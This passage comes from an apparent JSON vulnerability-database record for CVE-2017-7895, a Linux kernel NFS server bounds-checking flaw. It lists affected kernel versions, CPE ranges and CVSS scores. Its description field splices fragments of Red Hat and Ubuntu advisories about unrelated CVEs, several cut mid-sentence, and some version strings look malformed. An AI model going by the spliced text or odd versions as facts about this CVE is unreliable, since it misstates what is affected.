        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.22"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.69"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.98"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.276"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.7"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "98085"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-003674"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-7895"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.2.89",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.16.44",
                "versionStartIncluding": "3.3",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.1.40",
                "versionStartIncluding": "3.17.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.67",
                "versionStartIncluding": "4.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.26",
                "versionStartIncluding": "4.5.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.10.14",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-7895"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "143172"
      },
      {
        "db": "PACKETSTORM",
        "id": "143388"
      },
      {
        "db": "PACKETSTORM",
        "id": "144142"
      },
      {
        "db": "PACKETSTORM",
        "id": "143173"
      },
      {
        "db": "PACKETSTORM",
        "id": "143171"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2017-7895",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": true,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-7895",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-7895",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-7895",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-7895",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2017-7895"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-003674"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-7895"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The NFSv2 and NFSv3 server implementations in the Linux kernel through 4.10.13 lack certain checks for the end of a buffer, which allows remote attackers to trigger pointer-arithmetic errors or possibly have unspecified other impact via crafted requests, related to fs/nfsd/nfs3xdr.c and fs/nfsd/nfsxdr.c. Linux Kernel is prone to multiple security-bypass vulnerabilities. \nAttackers can exploit these issues to bypass certain security  restrictions and perform unauthorized actions. This may aid in further  attacks. 7) - noarch, x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. If heap (or different memory region) and stack memory\nregions were adjacent to each other, an attacker could use this flaw to\njump over the stack guard gap, cause controlled memory corruption on\nprocess stack or the adjacent memory region, and thus increase their\nprivileges on the system. This is a kernel-side mitigation which increases\nthe stack guard gap size from one page to 1 MiB to make successful\nexploitation of this issue more difficult. \n\nBug Fix(es):\n\n* The kernel-rt packages have been upgraded to the 3.10.0-514.25.2 source\ntree, which provides a number of bug fixes over the previous version. \n(BZ#1452742)\n\n* Previously, a local lock acquisition around the ip_send_unicast_reply()\nfunction was incorrectly terminated. Consequently, a list corruption\noccurred that led to a kernel panic. This update adds locking functions\naround calls to ip_send_unicast_reply(). \n(BZ#1455239)\n\n4. 7.2) - ppc64, ppc64le, x86_64\n\n3. \n\nBug Fix(es):\n\n* Previously, a race condition between Linux kernel module error handling\nand kprobe registration code existed in the Linux kernel. The protection\nthat was applied during module error handling code could be overridden by\nkprobe registration code before the module was deallocated. Consequently,\nthe mapped page could be freed and become not \u0027writable\u0027. (BZ#1454683)\n\n* Due to a race with another NFS mount, the nfs41_walk_client_list()\nfunction previously established a lease on the nfs_client pointer before\nthe check for trunking was finished. This update ensures the processes\nfollow the correct order and the race no longer occurs in this scenario. \n(BZ#1447383)\n\n* If a duplicate IPv6 address or an issue setting an address was present in\nthe net/ipv6/addrconf.c file, a race condition occurred that could cause an\nIFP refcount leak. Attempts to unregister a netdevice then produced\n\"Unregister Netdevice Failed\" error messages. (BZ#1449103)\n\n* Previously, subtracting from vCPU threads could cause a steal_time\noverflow on QEMU live migration. This update makes sure steal_time\naccumulation to vCPU entry time is moved before copying steal_time data to\nQEMU guest, thus fixing this bug. (BZ#1274919)\n\n4. On systems with the stack protection feature enabled in the kernel\n(CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other\nthan s390x and ppc64[le]), an unauthenticated attacker able to initiate a\nconnection to a system via Bluetooth could use this flaw to crash the\nsystem. Due to the nature of the stack protection feature, code execution\ncannot be fully ruled out, although we believe it is unlikely. \n\nBug Fix(es):\n\n* Previously, while the MAP_GROWSDOWN flag was set, writing to the memory\nwhich was mapped with the mmap system call failed with the SIGBUS signal. (BZ#1474720)\n\n4. \n===========================================================================\nUbuntu Security Notice USN-3312-1\nJune 07, 2017\n\nlinux, linux-aws, linux-gke, linux-raspi2, linux-snapdragon vulnerabilities\n===========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. (CVE-2016-7917)\n\nQian Zhang discovered a heap-based buffer overflow in the tipc_msg_build()\nfunction in the Linux kernel. (CVE-2016-8632)\n\nIt was discovered that the keyring implementation in the Linux kernel in\nsome situations did not prevent special internal keyrings from being joined\nby userspace keyrings. A privileged local attacker could use this to bypass\nmodule verification. A privileged local attacker could use this to execute\narbitrary code. (CVE-2017-0605)\n\nDmitry Vyukov discovered that KVM implementation in the Linux kernel\nimproperly emulated the VMXON instruction. A local attacker in a guest OS\ncould use this to cause a denial of service (memory consumption) in the\nhost OS. (CVE-2017-6001)\n\nEric Biggers discovered a memory leak in the keyring implementation in the\nLinux kernel. (CVE-2017-7472)\n\nSabrina Dubroca discovered that the asynchronous cryptographic hash (ahash)\nimplementation in the Linux kernel did not properly handle a full request\nqueue. (CVE-2017-7645)\n\nTommi Rantala and Brad Spengler discovered that the memory manager in the\nLinux kernel did not properly enforce the CONFIG_STRICT_DEVMEM protection\nmechanism. A local attacker with access to /dev/mem could use this to\nexpose sensitive information or possibly execute arbitrary code. (CVE-2016-7913)\n\nVlad Tsyrklevich discovered an integer overflow vulnerability in the VFIO\nPCI driver for the Linux kernel. A local attacker with access to a vfio PCI\ndevice file could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-9083, CVE-2016-9084)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n  linux-image-4.4.0-1014-gke      4.4.0-1014.14\n  linux-image-4.4.0-1018-aws      4.4.0-1018.27\n  linux-image-4.4.0-1057-raspi2   4.4.0-1057.64\n  linux-image-4.4.0-1059-snapdragon  4.4.0-1059.63\n  linux-image-4.4.0-79-generic    4.4.0-79.100\n  linux-image-4.4.0-79-generic-lpae  4.4.0-79.100\n  linux-image-4.4.0-79-lowlatency  4.4.0-79.100\n  linux-image-4.4.0-79-powerpc-e500mc  4.4.0-79.100\n  linux-image-4.4.0-79-powerpc-smp  4.4.0-79.100\n  linux-image-4.4.0-79-powerpc64-smp  4.4.0-79.100\n  linux-image-aws                 4.4.0.1018.21\n  linux-image-generic             4.4.0.79.85\n  linux-image-generic-lpae        4.4.0.79.85\n  linux-image-gke                 4.4.0.1014.16\n  linux-image-lowlatency          4.4.0.79.85\n  linux-image-powerpc-e500mc      4.4.0.79.85\n  linux-image-powerpc-smp         4.4.0.79.85\n  linux-image-powerpc64-emb       4.4.0.79.85\n  linux-image-powerpc64-smp       4.4.0.79.85\n  linux-image-raspi2              4.4.0.1057.58\n  linux-image-snapdragon          4.4.0.1059.52\n  linux-image-virtual             4.4.0.79.85\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. Relevant releases/architectures:\n\nMRG Realtime for RHEL 6 Server v.2 - noarch, x86_64\n\n3. \n(BZ#1452745)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2017:1615-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2017:1615\nIssue date:        2017-06-28\nCVE Names:         CVE-2017-2583 CVE-2017-6214 CVE-2017-7477 \n                   CVE-2017-7645 CVE-2017-7895 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. \n\nSecurity Fix(es):\n\n* A flaw was found in the way Linux kernel allocates heap memory to build\nthe scattergather list from a fragment list(skb_shinfo(skb)-\u003efrag_list) in\nthe socket buffer(skb_buff). The heap overflow occurred if \u0027MAX_SKB_FRAGS +\n1\u0027 parameter and \u0027NETIF_F_FRAGLIST\u0027 feature were used together. A\nremote user or process could use this flaw to potentially escalate their\nprivilege on a system. (CVE-2017-7477, Important)\n\n* The NFS2/3 RPC client could send long arguments to the NFS server. These\nencoded arguments are stored in an array of memory pages, and accessed\nusing pointer variables. Arbitrarily long arguments could make these\npointers point outside the array and cause an out-of-bounds memory access. \nA remote user or program could use this flaw to crash the kernel (denial of\nservice). (CVE-2017-7895, Important)\n\n* The Linux kernel built with the Kernel-based Virtual Machine (CONFIG_KVM)\nsupport was vulnerable to an incorrect segment selector(SS) value error. \nThe error could occur while loading values into the SS register in long\nmode. A user or process inside a guest could use this flaw to crash the\nguest, resulting in DoS or potentially escalate their privileges inside the\nguest. (CVE-2017-2583, Moderate)\n\n* A flaw was found in the Linux kernel\u0027s handling of packets with the URG\nflag. Applications using the splice() and tcp_splice_read() functionality\ncould allow a remote attacker to force the kernel to enter a condition in\nwhich it could loop indefinitely. (CVE-2017-6214, Moderate)\n\nRed Hat would like to thank Ari Kauppi for reporting CVE-2017-7895 and\nXiaohan Zhang (Huawei Inc.) for reporting CVE-2017-2583. \n\nBug Fix(es):\n\n* Previously, the reserved-pages counter (HugePages_Rsvd) was bigger than\nthe total-pages counter (HugePages_Total) in the /proc/meminfo file, and\nHugePages_Rsvd underflowed. With this update, the HugeTLB feature of the\nLinux kernel has been fixed, and HugePages_Rsvd underflow no longer occurs. \n(BZ#1445184)\n\n* If a directory on a NFS client was modified while being listed, the NFS\nclient could restart the directory listing multiple times. Consequently,\nthe performance of listing the directory was sub-optimal. With this update,\nthe restarting of the directory listing happens less frequently. As a\nresult, the performance of listing the directory while it is being modified\nhas improved. (BZ#1450851)\n\n* The Fibre Channel over Ethernet (FCoE) adapter in some cases failed to\nreboot. This update fixes the qla2xxx driver, and FCoE adapter now reboots\nas expected. (BZ#1446246)\n\n* When a VM with Virtual Function I/O (VFIO) device was rebooted, the QEMU\nprocess occasionally terminated unexpectedly due to a failed VFIO Direct\nMemory Access (DMA) map request. This update fixes the vfio driver and QEMU\nno longer crashes in the described situation. (BZ#1450855)\n\n* When the operating system was booted with the in-box lpfc driver, a\nkernel panic occurred on the little-endian variant of IBM Power Systems. \nThis update fixes lpfc, and the kernel no longer panics in the described\nsituation. (BZ#1452044)\n\n* When creating or destroying a VM with Virtual Function I/O (VFIO) devices\nwith \"Hugepages\" feature enabled, errors in Direct Memory Access (DMA) page\ntable entry (PTE) mappings occurred, and QEMU memory usage behaved\nunpredictably. This update fixes range computation when making room for\nlarge pages in Input/Output Memory Management Unit (IOMMU). As a result,\nerrors in DMA PTE mappings no longer occur, and QEMU has a predictable\nmemory usage in the described situation. (BZ#1450856)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1414735 - CVE-2017-2583 Kernel: Kvm: vmx/svm potential privilege escalation inside guest\n1426542 - CVE-2017-6214 kernel: ipv4/tcp: Infinite loop in tcp_splice_read()\n1443615 - CVE-2017-7645 kernel: nfsd: Incorrect handling of long RPC replies\n1445207 - CVE-2017-7477 kernel: net: Heap overflow in skb_to_sgvec in macsec.c\n1446103 - CVE-2017-7895 kernel: NFSv3 server does not properly handle payload bounds checking of WRITE requests\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-514.26.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-514.26.1.el7.noarch.rpm\nkernel-doc-3.10.0-514.26.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debug-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-devel-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-headers-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-514.26.1.el7.x86_64.rpm\nperf-3.10.0-514.26.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\npython-perf-3.10.0-514.26.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-514.26.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkernel-3.10.0-514.26.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-514.26.1.el7.noarch.rpm\nkernel-doc-3.10.0-514.26.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debug-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-devel-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-headers-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-514.26.1.el7.x86_64.rpm\nperf-3.10.0-514.26.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\npython-perf-3.10.0-514.26.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-514.26.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-514.26.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-514.26.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-514.26.1.el7.noarch.rpm\nkernel-doc-3.10.0-514.26.1.el7.noarch.rpm\n\nppc64:\nkernel-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-debug-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-devel-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-headers-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-tools-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-514.26.1.el7.ppc64.rpm\nperf-3.10.0-514.26.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm\npython-perf-3.10.0-514.26.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-514.26.1.el7.ppc64.rpm\n\nppc64le:\nkernel-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-debug-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-514.26.1.el7.ppc64le.rpm\nkernel-devel-3.10.0-514.26.1.el7.p